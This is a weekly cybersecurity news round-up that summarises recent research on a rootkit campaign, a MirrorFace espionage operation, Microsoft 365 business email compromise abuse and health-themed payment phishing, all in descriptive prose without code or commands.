Weekly Cyber Round-up

OBSCURE#BAT social engineering campaign delivers r77 rootkit

Securonix researchers analysed an ongoing social engineering campaign, dubbed OBSCURE#BAT, that tricks users into executing a heavily obfuscated batch script to deliver the r77 user-mode rootkit. The campaign primarily targets English-speaking individuals, with the attacker’s infrastructure indicating a base in the United States and telemetry in Canada, Germany, and the United Kingdom. r77 monitors clipboard and command history, and saves them into hidden files for exfiltration. The malware is delivered via either a legitimate software download or fake CAPTCHA using the ClickFix technique. Successful exploitation leads to the download of a ZIP file containing legitimate files and a malicious batch file.

MirrorFace APT’s Operation AkaiRyū leverages custom AsyncRAT variant and ANEL backdoor

ESET researchers detailed Operation AkaiRyū, an espionage campaign by the advanced persistent threat actor (APT), MirrorFace. The campaign was first detected in Q2 and Q3 2024 and targeted a Japanese research institute and a Central European diplomatic institute using a World Expo 2025 lure, marking the first time MirrorFace has targeted a European entity. As part of the campaign, MirrorFace introduced new tools and techniques, including a customised version of AsyncRAT and the use of ANEL backdoor. MirrorFace conducted multiple spear phishing campaigns in the observed period, to trick users into opening malicious attachments or links as an initial access vector. The campaign also involved the abuse of McAfee and JustSystems applications to sideload the ANEL backdoor.

Phishing campaign exploits Microsoft 365 infrastructure for BEC attacks

Guardz researchers discovered a highly sophisticated phishing campaign that exploits Microsoft 365’s infrastructure for potential credential harvesting and account takeover attempts. The campaign utilises legitimate Microsoft domains and tenant misconfigurations to conduct business email compromise (BEC) attacks. The campaign also leverages Microsoft service-generated emails and operates entirely within Microsoft’s ecosystem, allowing the threat actors to evade detection and deliver authentic phishing lures. The infection chain involves six phases and begins with the threat actor registering or gaining control of multiple Microsoft tenants, which are used for various malicious purposes such as unauthorised purchases, brand impersonation, and to serve as a relay point. The final phase involves the attackers engaging with the targeted victim via a fake support number embedded within the phishing email. 

Phishing campaign uses health concerns and products as lures to steal payment details

JUMPSEC researchers observed a multi-stage phishing campaign that exploited health-related concerns as lures to steal payment information. The phishing emails claimed to be offering health products and contained links that redirected victims to a ‘Human Verification Check’ page. Upon completing the verification process, victims were redirected to a shopping website that was designed to mimic a legitimate online store. Victims who attempted to add products to their online shopping cart were redirected to a payment page hosted on the ClickBank marketplace. Victims were then deceived into entering their payment details under the guise of making a legitimate purchase. The researchers identified multiple other phishing emails that followed a similar attack chain and originated from the same phishing domains.